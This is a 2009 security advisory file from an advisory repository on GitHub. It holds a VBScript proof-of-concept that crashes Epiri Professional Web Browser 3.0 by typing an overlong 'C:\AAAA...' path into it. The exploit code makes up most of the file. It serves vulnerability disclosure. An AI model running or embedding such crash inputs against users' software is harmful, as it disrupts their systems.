forked from liquidworm/advisory
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ZSL-2009-4923
45 lines (29 loc) · 1.02 KB
/
ZSL-2009-4923
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Notiz: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)
' Vulnerable strings:
' file://
' C::
' C:\AAAA...AAAA [257]
'
' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009
' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs
Dim crash
Set crash = CreateObject("WScript.Shell")
With crash
Do Until Success = True
Success = crash.AppActivate("Epiri Professional 3.0")
Loop
'.SendKeys "file://"
'.SendKeys "C::"
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
.SendKeys "~" 'Return
End With
Wscript.Quit